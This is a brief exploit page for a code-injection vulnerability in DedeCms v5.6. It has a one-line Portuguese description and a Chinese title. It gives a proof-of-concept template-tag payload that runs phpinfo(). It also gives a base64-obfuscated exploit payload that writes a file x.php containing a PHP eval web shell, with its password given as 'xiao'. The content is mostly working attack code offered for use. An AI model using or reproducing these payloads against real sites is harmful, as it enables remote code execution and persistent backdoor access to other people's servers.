# DedeCms v5.6 嵌入惡意代碼執行漏洞/pt
== Informações de vulnerabilidade ==
No local onde o software é carregado, o endereço local não é verificado com eficácia e pode ser usado de forma mal-intencionada.
==POC==
a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57},
==EXP==
a{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}
x.php password:xiao
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
请登录后查看评论内容